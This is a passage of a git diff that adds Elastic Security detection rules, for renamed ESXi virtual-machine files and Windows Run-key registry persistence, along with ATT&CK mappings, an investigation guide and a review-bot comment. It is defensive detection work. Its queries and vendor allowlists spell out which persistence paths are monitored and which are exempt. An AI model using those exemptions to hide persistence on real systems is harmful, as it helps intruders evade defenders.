"OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": 
"T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_6.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_6.json new file mode 100644 index 00000000000..1c76b43beed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_6.json 
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where VMware-related files, such as those with extensions like \".vmdk\", \".vmx\", \".vmxf\", \".vmsd\", \".vmsn\", \".vswp\", \".vmss\", \".nvram\", and \".vmem\", are renamed on a Linux system. The rule monitors for the \"rename\" event action associated with these file types, which could indicate malicious activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Renaming of ESXI Files", + "query": "file where host.os.type == \"linux\" and event.action == \"rename\" and\nfile.Ext.original.name : (\"*.vmdk\", \"*.vmx\", \"*.vmxf\", \"*.vmsd\", \"*.vmsn\", \"*.vswp\", \"*.vmss\", \"*.nvram\", \"*.vmem\")\nand not file.name : (\"*.vmdk\", \"*.vmx\", \"*.vmxf\", \"*.vmsd\", \"*.vmsn\", \"*.vswp\", \"*.vmss\", \"*.nvram\", \"*.vmem\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.original.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97db8b42-69d8-4bf3-9fd4-c69a1d895d68", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "97db8b42-69d8-4bf3-9fd4-c69a1d895d68_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_110.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_110.json new file mode 100644 index 00000000000..37ae21b821d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_110.json 
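Review bot: The `setup` text links `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, a version-pinned URL, while every other link in the same field uses `current`; the pin will go stale as this rule ships with newer stacks, so change it to `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`. Separately, `index` is still the broad `logs-endpoint.events.*` although the query is `file where ...`; the Zoom rule's version 110 in this commit narrows its pattern to `logs-endpoint.events.process-*`, and the analogous `logs-endpoint.events.file-*` would scope this search the same way, assuming the upstream rule set has moved to per-event-type streams.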
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Startup or Run Key Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive 
as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n (\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\",\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\system_tray\\\\lghub_system_tray.exe\\\" --minimized\"\n )\n ) or\n (\n process.name : \"LogiBolt.exe\" and registry.data.strings : (\n \"?:\\\\Program Files\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\"\n )\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n 
process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --win-session-start\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\",\n \"?:\\\\ProgramData\\\\*\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background*\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background*\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"OneDrive.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" 
/background\",\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\\" /background\"\n ) or\n \n process.name : \"Microsoft.SharePoint.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"MicrosoftEdgeUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\Expedient\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\*\\\\MicrosoftEdgeUpdateCore.exe\\\"\"\n ) or\n \n process.executable : \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\\\" --msedgewebview --delete-old-versions --system-level --verbose-logging --on-logon\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\ProgramData\\\\*\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\Program Files\\\\Slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* Cisco */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n (\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n ) or\n (\n process.name : \"CiscoJabber.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Cisco Systems\\\\Cisco Jabber\\\\CiscoJabber.exe\\\" /min\"\n )\n )\n ) or\n\n /* Loom */\n (\n 
process.code_signature.trusted == true and process.code_signature.subject_name == \"Loom, Inc.\" and\n process.name : \"Loom.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Loom\\\\Loom.exe --process-start-args \\\"--loomHidden\\\"\"\n )\n ) or\n\n /* Adobe */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n process.name : (\"Acrobat.exe\", \"FlashUtil32_*_Plugin.exe\") and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\Macromed\\\\Flash\\\\FlashUtil32_*_Plugin.exe -update plugin\"\n )\n ) or\n\n /* CCleaner */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"PIRIFORM SOFTWARE LIMITED\" and\n process.name : (\"CCleanerBrowser.exe\", \"CCleaner64.exe\") and registry.data.strings : (\n \"\\\"C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\\\"Default\\\"\",\n \"\\\"C:\\\\Program Files\\\\CCleaner\\\\CCleaner64.exe\\\" /MONITOR\"\n )\n ) or\n\n /* Opera */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Opera Norway AS\" and\n process.name : \"opera.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera\\\\launcher.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera GX\\\\launcher.exe\"\n )\n ) or\n\n /* Avast */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Avast Software s.r.o.\" and\n process.name : \"AvastBrowser.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" 
--check-run=src=logon --auto-launch-at-startup*\",\n \"\\\"?:\\\\Program Files (x86)\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\"\n )\n ) or\n\n /* Grammarly */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Grammarly, Inc.\" and\n process.name : \"GrammarlyInstaller.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Grammarly\\\\DesktopIntegrations\\\\Grammarly.Desktop.exe\"\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "97fc44d3-8dae-4019-ae83-298c3015600f", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + 
"id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "97fc44d3-8dae-4019-ae83-298c3015600f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_111.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_111.json new file mode 100644 index 00000000000..fc6d15743e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_111.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Startup or Run Key Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive 
